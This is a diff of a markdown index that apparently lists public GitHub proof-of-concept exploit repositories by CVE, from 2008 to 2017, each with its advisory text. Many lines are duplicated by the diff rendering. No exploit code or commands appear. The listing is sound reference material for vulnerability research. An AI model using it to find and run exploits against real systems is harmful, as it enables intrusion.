A remote code execution vulnerability in the Framesequence library could enable an attacker using a specially crafted file to execute arbitrary code in the context of an unprivileged process. This issue is rated as High due to the possibility of remote code execution in an application that uses the Framesequence library. Product: Android. Versions: 5.0.2, 5.1.1, 6.0, 6.0.1, 7.0, 7.1.1. Android ID: A-33718716. A remote code execution vulnerability in the Framesequence library could enable an attacker using a specially crafted file to execute arbitrary code in the context of an unprivileged process. This issue is rated as High due to the possibility of remote code execution in an application that uses the Framesequence library. Product: Android. Versions: 5.0.2, 5.1.1, 6.0, 6.0.1, 7.0, 7.1.1. Android ID: A-33718716.
</code> </code>
- [JiounDai/CVE-2017-0478](https://github.com/JiounDai/CVE-2017-0478)
- [denmilu/CVE-2017-0478](https://github.com/denmilu/CVE-2017-0478) - [denmilu/CVE-2017-0478](https://github.com/denmilu/CVE-2017-0478)
### CVE-2017-0541 ### CVE-2017-0541
@ -8676,9 +8667,6 @@ An issue was discovered in certain Apple products. iOS before 10.2.1 is affected
An issue was discovered in certain Apple products. iOS before 10.2.1 is affected. macOS before 10.12.3 is affected. tvOS before 10.1.1 is affected. watchOS before 3.1.3 is affected. The issue involves the &quot;Kernel&quot; component. It allows attackers to execute arbitrary code in a privileged context or cause a denial of service (buffer overflow) via a crafted app. An issue was discovered in certain Apple products. iOS before 10.2.1 is affected. macOS before 10.12.3 is affected. tvOS before 10.1.1 is affected. watchOS before 3.1.3 is affected. The issue involves the &quot;Kernel&quot; component. It allows attackers to execute arbitrary code in a privileged context or cause a denial of service (buffer overflow) via a crafted app.
</code> </code>
- [maximehip/extra_recipe](https://github.com/maximehip/extra_recipe)
- [JackBro/extra_recipe](https://github.com/JackBro/extra_recipe)
- [Rootkitsmm/extra_recipe-iOS-10.2](https://github.com/Rootkitsmm/extra_recipe-iOS-10.2)
- [Peterpan0927/CVE-2017-2370](https://github.com/Peterpan0927/CVE-2017-2370) - [Peterpan0927/CVE-2017-2370](https://github.com/Peterpan0927/CVE-2017-2370)
### CVE-2017-2388 ### CVE-2017-2388
@ -8689,14 +8677,6 @@ An issue was discovered in certain Apple products. macOS before 10.12.4 is affec
- [bazad/IOFireWireFamily-null-deref](https://github.com/bazad/IOFireWireFamily-null-deref) - [bazad/IOFireWireFamily-null-deref](https://github.com/bazad/IOFireWireFamily-null-deref)
### CVE-2017-2636
<code>
Race condition in drivers/tty/n_hdlc.c in the Linux kernel through 4.10.1 allows local users to gain privileges or cause a denial of service (double free) by setting the HDLC line discipline.
</code>
- [alexzorin/cve-2017-2636-el](https://github.com/alexzorin/cve-2017-2636-el)
### CVE-2017-2666 ### CVE-2017-2666
<code> <code>
@ -8801,7 +8781,6 @@ Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Serve
In OpenSSL 1.1.0 before 1.1.0d, if a malicious server supplies bad parameters for a DHE or ECDHE key exchange then this can result in the client attempting to dereference a NULL pointer leading to a client crash. This could be exploited in a Denial of Service attack. In OpenSSL 1.1.0 before 1.1.0d, if a malicious server supplies bad parameters for a DHE or ECDHE key exchange then this can result in the client attempting to dereference a NULL pointer leading to a client crash. This could be exploited in a Denial of Service attack.
</code> </code>
- [guidovranken/CVE-2017-3730](https://github.com/guidovranken/CVE-2017-3730)
- [ymmah/OpenSSL-CVE-2017-3730](https://github.com/ymmah/OpenSSL-CVE-2017-3730) - [ymmah/OpenSSL-CVE-2017-3730](https://github.com/ymmah/OpenSSL-CVE-2017-3730)
### CVE-2017-3881 ### CVE-2017-3881
@ -8903,32 +8882,13 @@ Multiple cross-site request forgery (CSRF) vulnerabilities on the D-Link DI-524
The Jakarta Multipart parser in Apache Struts 2 2.3.x before 2.3.32 and 2.5.x before 2.5.10.1 has incorrect exception handling and error-message generation during file-upload attempts, which allows remote attackers to execute arbitrary commands via a crafted Content-Type, Content-Disposition, or Content-Length HTTP header, as exploited in the wild in March 2017 with a Content-Type header containing a #cmd= string. The Jakarta Multipart parser in Apache Struts 2 2.3.x before 2.3.32 and 2.5.x before 2.5.10.1 has incorrect exception handling and error-message generation during file-upload attempts, which allows remote attackers to execute arbitrary commands via a crafted Content-Type, Content-Disposition, or Content-Length HTTP header, as exploited in the wild in March 2017 with a Content-Type header containing a #cmd= string.
</code> </code>
- [PolarisLab/S2-045](https://github.com/PolarisLab/S2-045)
- [Flyteas/Struts2-045-Exp](https://github.com/Flyteas/Struts2-045-Exp)
- [bongbongco/cve-2017-5638](https://github.com/bongbongco/cve-2017-5638)
- [jas502n/S2-045-EXP-POC-TOOLS](https://github.com/jas502n/S2-045-EXP-POC-TOOLS)
- [mthbernardes/strutszeiro](https://github.com/mthbernardes/strutszeiro)
- [xsscx/cve-2017-5638](https://github.com/xsscx/cve-2017-5638)
- [immunio/apache-struts2-CVE-2017-5638](https://github.com/immunio/apache-struts2-CVE-2017-5638)
- [Masahiro-Yamada/OgnlContentTypeRejectorValve](https://github.com/Masahiro-Yamada/OgnlContentTypeRejectorValve)
- [aljazceru/CVE-2017-5638-Apache-Struts2](https://github.com/aljazceru/CVE-2017-5638-Apache-Struts2)
- [sjitech/test_struts2_vulnerability_CVE-2017-5638](https://github.com/sjitech/test_struts2_vulnerability_CVE-2017-5638)
- [jrrombaldo/CVE-2017-5638](https://github.com/jrrombaldo/CVE-2017-5638)
- [random-robbie/CVE-2017-5638](https://github.com/random-robbie/CVE-2017-5638)
- [initconf/CVE-2017-5638_struts](https://github.com/initconf/CVE-2017-5638_struts) - [initconf/CVE-2017-5638_struts](https://github.com/initconf/CVE-2017-5638_struts)
- [mazen160/struts-pwn](https://github.com/mazen160/struts-pwn) - [mazen160/struts-pwn](https://github.com/mazen160/struts-pwn)
- [ret2jazzy/Struts-Apache-ExploitPack](https://github.com/ret2jazzy/Struts-Apache-ExploitPack)
- [lolwaleet/ExpStruts](https://github.com/lolwaleet/ExpStruts)
- [oktavianto/CVE-2017-5638-Apache-Struts2](https://github.com/oktavianto/CVE-2017-5638-Apache-Struts2)
- [jrrdev/cve-2017-5638](https://github.com/jrrdev/cve-2017-5638) - [jrrdev/cve-2017-5638](https://github.com/jrrdev/cve-2017-5638)
- [opt9/Strutshock](https://github.com/opt9/Strutshock)
- [falcon-lnhg/StrutsShell](https://github.com/falcon-lnhg/StrutsShell) - [falcon-lnhg/StrutsShell](https://github.com/falcon-lnhg/StrutsShell)
- [bhagdave/CVE-2017-5638](https://github.com/bhagdave/CVE-2017-5638)
- [jas502n/st2-046-poc](https://github.com/jas502n/st2-046-poc) - [jas502n/st2-046-poc](https://github.com/jas502n/st2-046-poc)
- [KarzsGHR/S2-046_S2-045_POC](https://github.com/KarzsGHR/S2-046_S2-045_POC) - [KarzsGHR/S2-046_S2-045_POC](https://github.com/KarzsGHR/S2-046_S2-045_POC)
- [gsfish/S2-Reaper](https://github.com/gsfish/S2-Reaper)
- [mcassano/cve-2017-5638](https://github.com/mcassano/cve-2017-5638) - [mcassano/cve-2017-5638](https://github.com/mcassano/cve-2017-5638)
- [opt9/Strutscli](https://github.com/opt9/Strutscli)
- [tahmed11/strutsy](https://github.com/tahmed11/strutsy) - [tahmed11/strutsy](https://github.com/tahmed11/strutsy)
- [payatu/CVE-2017-5638](https://github.com/payatu/CVE-2017-5638) - [payatu/CVE-2017-5638](https://github.com/payatu/CVE-2017-5638)
- [Aasron/Struts2-045-Exp](https://github.com/Aasron/Struts2-045-Exp) - [Aasron/Struts2-045-Exp](https://github.com/Aasron/Struts2-045-Exp)
@ -9092,14 +9052,6 @@ D-Link DGS-1510-28XMP, DGS-1510-28X, DGS-1510-52X, DGS-1510-52, DGS-1510-28P, DG
- [varangamin/CVE-2017-6206](https://github.com/varangamin/CVE-2017-6206) - [varangamin/CVE-2017-6206](https://github.com/varangamin/CVE-2017-6206)
### CVE-2017-6370
<code>
TYPO3 7.6.15 sends an http request to an index.php?loginProvider URI in cases with an https Referer, which allows remote attackers to obtain sensitive cleartext information by sniffing the network and reading the userident and username fields.
</code>
- [faizzaidi/TYPO3-v7.6.15-Unencrypted-Login-Request](https://github.com/faizzaidi/TYPO3-v7.6.15-Unencrypted-Login-Request)
### CVE-2017-6558 ### CVE-2017-6558
<code> <code>
@ -9215,11 +9167,7 @@ Zurmo 3.1.1 Stable allows a Cross-Site Scripting (XSS) attack with a base64-enco
Buffer overflow in the ScStoragePathFromUrl function in the WebDAV service in Internet Information Services (IIS) 6.0 in Microsoft Windows Server 2003 R2 allows remote attackers to execute arbitrary code via a long header beginning with &quot;If: &lt;http://&quot; in a PROPFIND request, as exploited in the wild in July or August 2016. Buffer overflow in the ScStoragePathFromUrl function in the WebDAV service in Internet Information Services (IIS) 6.0 in Microsoft Windows Server 2003 R2 allows remote attackers to execute arbitrary code via a long header beginning with &quot;If: &lt;http://&quot; in a PROPFIND request, as exploited in the wild in July or August 2016.
</code> </code>
- [eliuha/webdav_exploit](https://github.com/eliuha/webdav_exploit)
- [lcatro/CVE-2017-7269-Echo-PoC](https://github.com/lcatro/CVE-2017-7269-Echo-PoC) - [lcatro/CVE-2017-7269-Echo-PoC](https://github.com/lcatro/CVE-2017-7269-Echo-PoC)
- [caicai1355/CVE-2017-7269-exploit](https://github.com/caicai1355/CVE-2017-7269-exploit)
- [M1a0rz/CVE-2017-7269](https://github.com/M1a0rz/CVE-2017-7269)
- [whiteHat001/cve-2017-7269picture](https://github.com/whiteHat001/cve-2017-7269picture)
- [zcgonvh/cve-2017-7269](https://github.com/zcgonvh/cve-2017-7269) - [zcgonvh/cve-2017-7269](https://github.com/zcgonvh/cve-2017-7269)
- [jrrombaldo/CVE-2017-7269](https://github.com/jrrombaldo/CVE-2017-7269) - [jrrombaldo/CVE-2017-7269](https://github.com/jrrombaldo/CVE-2017-7269)
- [g0rx/iis6-exploit-2017-CVE-2017-7269](https://github.com/g0rx/iis6-exploit-2017-CVE-2017-7269) - [g0rx/iis6-exploit-2017-CVE-2017-7269](https://github.com/g0rx/iis6-exploit-2017-CVE-2017-7269)
@ -13215,6 +13163,14 @@ Directory traversal vulnerability in MDM.php in Novell ZENworks Mobile Managemen
- [steponequit/CVE-2013-1081](https://github.com/steponequit/CVE-2013-1081) - [steponequit/CVE-2013-1081](https://github.com/steponequit/CVE-2013-1081)
### CVE-2013-1300
<code>
win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows Server 2012, and Windows RT does not properly handle objects in memory, which allows local users to gain privileges via a crafted application, aka &quot;Win32k Memory Allocation Vulnerability.&quot;
</code>
- [Meatballs1/cve-2013-1300](https://github.com/Meatballs1/cve-2013-1300)
### CVE-2013-1488 ### CVE-2013-1488
<code> <code>
@ -13231,6 +13187,14 @@ The Java Runtime Environment (JRE) component in Oracle Java SE 7 Update 17 and e
- [guhe120/CVE20131491-JIT](https://github.com/guhe120/CVE20131491-JIT) - [guhe120/CVE20131491-JIT](https://github.com/guhe120/CVE20131491-JIT)
### CVE-2013-1690
<code>
Mozilla Firefox before 22.0, Firefox ESR 17.x before 17.0.7, Thunderbird before 17.0.7, and Thunderbird ESR 17.x before 17.0.7 do not properly handle onreadystatechange events in conjunction with page reloading, which allows remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via a crafted web site that triggers an attempt to execute data at an unmapped memory location.
</code>
- [vlad902/annotated-fbi-tbb-exploit](https://github.com/vlad902/annotated-fbi-tbb-exploit)
### CVE-2013-1775 ### CVE-2013-1775
<code> <code>
@ -13258,6 +13222,14 @@ The ngx_http_parse_chunked function in http/ngx_http_parse.c in nginx 1.3.9 thro
- [tachibana51/CVE-2013-2028-x64-bypass-ssp-and-pie-PoC](https://github.com/tachibana51/CVE-2013-2028-x64-bypass-ssp-and-pie-PoC) - [tachibana51/CVE-2013-2028-x64-bypass-ssp-and-pie-PoC](https://github.com/tachibana51/CVE-2013-2028-x64-bypass-ssp-and-pie-PoC)
- [m4drat/CVE-2013-2028-Exploit](https://github.com/m4drat/CVE-2013-2028-Exploit) - [m4drat/CVE-2013-2028-Exploit](https://github.com/m4drat/CVE-2013-2028-Exploit)
### CVE-2013-2072
<code>
Buffer overflow in the Python bindings for the xc_vcpu_setaffinity call in Xen 4.0.x, 4.1.x, and 4.2.x allows local administrators with permissions to configure VCPU affinity to cause a denial of service (memory corruption and xend toolstack crash) and possibly gain privileges via a crafted cpumap.
</code>
- [bl4ck5un/cve-2013-2072](https://github.com/bl4ck5un/cve-2013-2072)
### CVE-2013-2094 ### CVE-2013-2094
<code> <code>
@ -13305,6 +13277,14 @@ Integer overflow in the fb_mmap function in drivers/video/fbmem.c in the Linux k
- [hiikezoe/libfb_mem_exploit](https://github.com/hiikezoe/libfb_mem_exploit) - [hiikezoe/libfb_mem_exploit](https://github.com/hiikezoe/libfb_mem_exploit)
### CVE-2013-2597
<code>
Stack-based buffer overflow in the acdb_ioctl function in audio_acdb.c in the acdb audio driver for the Linux kernel 2.6.x and 3.x, as used in Qualcomm Innovation Center (QuIC) Android contributions for MSM devices and other products, allows attackers to gain privileges via an application that leverages /dev/msm_acdb access and provides a large size value in an ioctl argument.
</code>
- [fi01/libmsm_acdb_exploit](https://github.com/fi01/libmsm_acdb_exploit)
### CVE-2013-2729 ### CVE-2013-2729
<code> <code>
@ -13313,6 +13293,14 @@ Integer overflow in Adobe Reader and Acrobat 9.x before 9.5.5, 10.x before 10.1.
- [feliam/CVE-2013-2729](https://github.com/feliam/CVE-2013-2729) - [feliam/CVE-2013-2729](https://github.com/feliam/CVE-2013-2729)
### CVE-2013-2730
<code>
Buffer overflow in Adobe Reader and Acrobat 9.x before 9.5.5, 10.x before 10.1.7, and 11.x before 11.0.03 allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2013-2733.
</code>
- [feliam/CVE-2013-2730](https://github.com/feliam/CVE-2013-2730)
### CVE-2013-2842 ### CVE-2013-2842
<code> <code>
@ -13378,6 +13366,14 @@ MySecureShell 1.31 has a Local Denial of Service Vulnerability
- [hartwork/mysecureshell-issues](https://github.com/hartwork/mysecureshell-issues) - [hartwork/mysecureshell-issues](https://github.com/hartwork/mysecureshell-issues)
### CVE-2013-4348
<code>
The skb_flow_dissect function in net/core/flow_dissector.c in the Linux kernel through 3.12 allows remote attackers to cause a denial of service (infinite loop) via a small value in the IHL field of a packet with IPIP encapsulation.
</code>
- [bl4ck5un/cve-2013-4348](https://github.com/bl4ck5un/cve-2013-4348)
### CVE-2013-4378 ### CVE-2013-4378
<code> <code>
@ -13410,12 +13406,22 @@ The HP Integrated Lights-Out (iLO) BMC implementation allows remote attackers to
- [alexoslabs/ipmitest](https://github.com/alexoslabs/ipmitest) - [alexoslabs/ipmitest](https://github.com/alexoslabs/ipmitest)
### CVE-2013-5065
<code>
NDProxy.sys in the kernel in Microsoft Windows XP SP2 and SP3 and Server 2003 SP2 allows local users to gain privileges via a crafted application, as exploited in the wild in November 2013.
</code>
- [Friarfukd/RobbinHood](https://github.com/Friarfukd/RobbinHood)
### CVE-2013-5211 ### CVE-2013-5211
<code> <code>
The monlist feature in ntp_request.c in ntpd in NTP before 4.2.7p26 allows remote attackers to cause a denial of service (traffic amplification) via forged (1) REQ_MON_GETLIST or (2) REQ_MON_GETLIST_1 requests, as exploited in the wild in December 2013. The monlist feature in ntp_request.c in ntpd in NTP before 4.2.7p26 allows remote attackers to cause a denial of service (traffic amplification) via forged (1) REQ_MON_GETLIST or (2) REQ_MON_GETLIST_1 requests, as exploited in the wild in December 2013.
</code> </code>
- [dani87/ntpscanner](https://github.com/dani87/ntpscanner)
- [suedadam/ntpscanner](https://github.com/suedadam/ntpscanner)
- [sepehrdaddev/ntpdos](https://github.com/sepehrdaddev/ntpdos) - [sepehrdaddev/ntpdos](https://github.com/sepehrdaddev/ntpdos)
### CVE-2013-5664 ### CVE-2013-5664
@ -13456,8 +13462,27 @@ Dahua DVR 2.608.0000.0 and 2.608.GV00.0 allows remote attackers to bypass authen
The (1) get_user and (2) put_user API functions in the Linux kernel before 3.5.5 on the v6k and v7 ARM platforms do not validate certain addresses, which allows attackers to read or modify the contents of arbitrary kernel memory locations via a crafted application, as exploited in the wild against Android devices in October and November 2013. The (1) get_user and (2) put_user API functions in the Linux kernel before 3.5.5 on the v6k and v7 ARM platforms do not validate certain addresses, which allows attackers to read or modify the contents of arbitrary kernel memory locations via a crafted application, as exploited in the wild against Android devices in October and November 2013.
</code> </code>
- [fi01/libput_user_exploit](https://github.com/fi01/libput_user_exploit)
- [fi01/libget_user_exploit](https://github.com/fi01/libget_user_exploit)
- [jeboo/bypasslkm](https://github.com/jeboo/bypasslkm)
- [timwr/CVE-2013-6282](https://github.com/timwr/CVE-2013-6282) - [timwr/CVE-2013-6282](https://github.com/timwr/CVE-2013-6282)
### CVE-2013-6375
<code>
Xen 4.2.x and 4.3.x, when using Intel VT-d for PCI passthrough, does not properly flush the TLB after clearing a present translation table entry, which allows local guest administrators to cause a denial of service or gain privileges via unspecified vectors related to an &quot;inverted boolean parameter.&quot;
</code>
- [bl4ck5un/cve-2013-6375](https://github.com/bl4ck5un/cve-2013-6375)
### CVE-2013-6668
<code>
Multiple unspecified vulnerabilities in Google V8 before 3.24.35.10, as used in Google Chrome before 33.0.1750.146, allow attackers to cause a denial of service or possibly have other impact via unknown vectors.
</code>
- [sdneon/CveTest](https://github.com/sdneon/CveTest)
## 2012 ## 2012
### CVE-2012-0003 ### CVE-2012-0003
@ -13882,7 +13907,6 @@ mpack 1.6 has information disclosure via eavesdropping on mails sent by other us
sudo 1.6.x before 1.6.9p21 and 1.7.x before 1.7.2p4, when a pseudo-command is enabled, permits a match between the name of the pseudo-command and the name of an executable file in an arbitrary directory, which allows local users to gain privileges via a crafted executable file, as demonstrated by a file named sudoedit in a user's home directory. sudo 1.6.x before 1.6.9p21 and 1.7.x before 1.7.2p4, when a pseudo-command is enabled, permits a match between the name of the pseudo-command and the name of an executable file in an arbitrary directory, which allows local users to gain privileges via a crafted executable file, as demonstrated by a file named sudoedit in a user's home directory.
</code> </code>
- [t0kx/privesc-CVE-2010-0426](https://github.com/t0kx/privesc-CVE-2010-0426)
- [cved-sources/cve-2010-0426](https://github.com/cved-sources/cve-2010-0426) - [cved-sources/cve-2010-0426](https://github.com/cved-sources/cve-2010-0426)
### CVE-2010-0738 ### CVE-2010-0738
@ -13891,17 +13915,8 @@ sudo 1.6.x before 1.6.9p21 and 1.7.x before 1.7.2p4, when a pseudo-command is en
The JMX-Console web application in JBossAs in Red Hat JBoss Enterprise Application Platform (aka JBoss EAP or JBEAP) 4.2 before 4.2.0.CP09 and 4.3 before 4.3.0.CP08 performs access control only for the GET and POST methods, which allows remote attackers to send requests to this application's GET handler by using a different method. The JMX-Console web application in JBossAs in Red Hat JBoss Enterprise Application Platform (aka JBoss EAP or JBEAP) 4.2 before 4.2.0.CP09 and 4.3 before 4.3.0.CP08 performs access control only for the GET and POST methods, which allows remote attackers to send requests to this application's GET handler by using a different method.
</code> </code>
- [ChristianPapathanasiou/jboss-autopwn](https://github.com/ChristianPapathanasiou/jboss-autopwn)
- [gitcollect/jboss-autopwn](https://github.com/gitcollect/jboss-autopwn) - [gitcollect/jboss-autopwn](https://github.com/gitcollect/jboss-autopwn)
### CVE-2010-1205
<code>
Buffer overflow in pngpread.c in libpng before 1.2.44 and 1.4.x before 1.4.3, as used in progressive applications, might allow remote attackers to execute arbitrary code via a PNG image that triggers an additional data row.
</code>
- [mk219533/CVE-2010-1205](https://github.com/mk219533/CVE-2010-1205)
### CVE-2010-1411 ### CVE-2010-1411
<code> <code>
@ -13918,14 +13933,6 @@ UnrealIRCd 3.2.8.1, as distributed on certain mirror sites from November 2009 th
- [M4LV0/UnrealIRCd-3.2.8.1-RCE](https://github.com/M4LV0/UnrealIRCd-3.2.8.1-RCE) - [M4LV0/UnrealIRCd-3.2.8.1-RCE](https://github.com/M4LV0/UnrealIRCd-3.2.8.1-RCE)
### CVE-2010-3332
<code>
Microsoft .NET Framework 1.1 SP1, 2.0 SP1 and SP2, 3.5, 3.5 SP1, 3.5.1, and 4.0, as used for ASP.NET in Microsoft Internet Information Services (IIS), provides detailed error codes during decryption attempts, which allows remote attackers to decrypt and modify encrypted View State (aka __VIEWSTATE) form data, and possibly forge cookies or read application files, via a padding oracle attack, aka &quot;ASP.NET Padding Oracle Vulnerability.&quot;
</code>
- [bongbongco/MS10-070](https://github.com/bongbongco/MS10-070)
### CVE-2010-3333 ### CVE-2010-3333
<code> <code>
@ -13934,22 +13941,6 @@ Stack-based buffer overflow in Microsoft Office XP SP3, Office 2003 SP3, Office
- [whiteHat001/cve-2010-3333](https://github.com/whiteHat001/cve-2010-3333) - [whiteHat001/cve-2010-3333](https://github.com/whiteHat001/cve-2010-3333)
### CVE-2010-3437
<code>
Integer signedness error in the pkt_find_dev_from_minor function in drivers/block/pktcdvd.c in the Linux kernel before 2.6.36-rc6 allows local users to obtain sensitive information from kernel memory or cause a denial of service (invalid pointer dereference and system crash) via a crafted index value in a PKT_CTRL_CMD_STATUS ioctl call.
</code>
- [huang-emily/CVE-2010-3437](https://github.com/huang-emily/CVE-2010-3437)
### CVE-2010-3490
<code>
Directory traversal vulnerability in page.recordings.php in the System Recordings component in the configuration interface in FreePBX 2.8.0 and earlier allows remote authenticated administrators to create arbitrary files via a .. (dot dot) in the usersnum parameter to admin/config.php, as demonstrated by creating a .php file under the web root.
</code>
- [moayadalmalat/CVE-2010-3490](https://github.com/moayadalmalat/CVE-2010-3490)
### CVE-2010-3600 ### CVE-2010-3600
<code> <code>
@ -13982,22 +13973,6 @@ Use-after-free vulnerability in the CSharedStyleSheet::Notify function in the Ca
- [nektra/CVE-2010-3971-hotpatch](https://github.com/nektra/CVE-2010-3971-hotpatch) - [nektra/CVE-2010-3971-hotpatch](https://github.com/nektra/CVE-2010-3971-hotpatch)
### CVE-2010-4221
<code>
Multiple stack-based buffer overflows in the pr_netio_telnet_gets function in netio.c in ProFTPD before 1.3.3c allow remote attackers to execute arbitrary code via vectors involving a TELNET IAC escape character to a (1) FTP or (2) FTPS server.
</code>
- [M31MOTH/cve-2010-4221](https://github.com/M31MOTH/cve-2010-4221)
### CVE-2010-4258
<code>
The do_exit function in kernel/exit.c in the Linux kernel before 2.6.36.2 does not properly handle a KERNEL_DS get_fs value, which allows local users to bypass intended access_ok restrictions, overwrite arbitrary kernel memory locations, and gain privileges by leveraging a (1) BUG, (2) NULL pointer dereference, or (3) page fault, as demonstrated by vectors involving the clear_child_tid feature and the splice system call.
</code>
- [johnreginald/CVE-2010-4258](https://github.com/johnreginald/CVE-2010-4258)
### CVE-2010-4476 ### CVE-2010-4476
<code> <code>
@ -14030,9 +14005,6 @@ Liferay Portal through 6.2.10 allows remote authenticated users to execute arbit
- [Michael-Main/CVE-2010-5327](https://github.com/Michael-Main/CVE-2010-5327) - [Michael-Main/CVE-2010-5327](https://github.com/Michael-Main/CVE-2010-5327)
### CVE-2010-15606
- [Babs84/CVE-2010-15606](https://github.com/Babs84/CVE-2010-15606)
## 2009 ## 2009
### CVE-2009-0229 ### CVE-2009-0229
@ -14190,8 +14162,42 @@ The SingleSignOn Valve (org.apache.catalina.authenticator.SingleSignOn) in Apach
OpenSSL 0.9.8c-1 up to versions before 0.9.8g-9 on Debian-based operating systems uses a random number generator that generates predictable numbers, which makes it easier for remote attackers to conduct brute force guessing attacks against cryptographic keys. OpenSSL 0.9.8c-1 up to versions before 0.9.8g-9 on Debian-based operating systems uses a random number generator that generates predictable numbers, which makes it easier for remote attackers to conduct brute force guessing attacks against cryptographic keys.
</code> </code>
- [g0tmi1k/debian-ssh](https://github.com/g0tmi1k/debian-ssh)
- [avarx/vulnkeys](https://github.com/avarx/vulnkeys)
- [nu11secur1ty/debian-ssh](https://github.com/nu11secur1ty/debian-ssh) - [nu11secur1ty/debian-ssh](https://github.com/nu11secur1ty/debian-ssh)
### CVE-2008-0228
<code>
Cross-site request forgery (CSRF) vulnerability in apply.cgi in the Linksys WRT54GL Wireless-G Broadband Router with firmware 4.30.9 allows remote attackers to perform actions as administrators.
</code>
- [SpiderLabs/TWSL2011-007_iOS_code_workaround](https://github.com/SpiderLabs/TWSL2011-007_iOS_code_workaround)
### CVE-2008-1611
<code>
Stack-based buffer overflow in TFTP Server SP 1.4 for Windows allows remote attackers to cause a denial of service or execute arbitrary code via a long filename in a read or write request.
</code>
- [Axua/CVE-2008-1611](https://github.com/Axua/CVE-2008-1611)
### CVE-2008-1613
<code>
SQL injection vulnerability in ioRD.asp in RedDot CMS 7.5 Build 7.5.0.48, and possibly other versions including 6.5 and 7.0, allows remote attackers to execute arbitrary SQL commands via the LngId parameter.
</code>
- [SECFORCE/CVE-2008-1613](https://github.com/SECFORCE/CVE-2008-1613)
### CVE-2008-2019
<code>
Simple Machines Forum (SMF), probably 1.1.4, relies on &quot;randomly generated static&quot; to hinder brute-force attacks on the WAV file (aka audio) CAPTCHA, which allows remote attackers to pass the CAPTCHA test via an automated attack that considers Hamming distances. NOTE: this issue reportedly exists because of an insufficient fix for CVE-2007-3308.
</code>
- [TheRook/AudioCaptchaBypass-CVE-2008-2019](https://github.com/TheRook/AudioCaptchaBypass-CVE-2008-2019)
### CVE-2008-2938 ### CVE-2008-2938
<code> <code>
@ -14208,6 +14214,14 @@ The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP
- [thunderstrike9090/Conflicker_analysis_scripts](https://github.com/thunderstrike9090/Conflicker_analysis_scripts) - [thunderstrike9090/Conflicker_analysis_scripts](https://github.com/thunderstrike9090/Conflicker_analysis_scripts)
### CVE-2008-4609
<code>
The TCP implementation in (1) Linux, (2) platforms based on BSD Unix, (3) Microsoft Windows, (4) Cisco products, and probably other operating systems allows remote attackers to cause a denial of service (connection queue exhaustion) via multiple vectors that manipulate information in the TCP state table, as demonstrated by sockstress.
</code>
- [marcelki/sockstress](https://github.com/marcelki/sockstress)
### CVE-2008-4654 ### CVE-2008-4654
<code> <code>
@ -14215,6 +14229,15 @@ Stack-based buffer overflow in the parse_master function in the Ty demux plugin
</code> </code>
- [bongbongco/CVE-2008-4654](https://github.com/bongbongco/CVE-2008-4654) - [bongbongco/CVE-2008-4654](https://github.com/bongbongco/CVE-2008-4654)
- [KernelErr/VLC-CVE-2008-4654-Exploit](https://github.com/KernelErr/VLC-CVE-2008-4654-Exploit)
### CVE-2008-4687
<code>
manage_proj_page.php in Mantis before 1.1.4 allows remote authenticated users to execute arbitrary code via a sort parameter containing PHP sequences, which are processed by create_function within the multi_sort function in core/utility_api.php.
</code>
- [nmurilo/CVE-2008-4687-exploit](https://github.com/nmurilo/CVE-2008-4687-exploit)
### CVE-2008-5416 ### CVE-2008-5416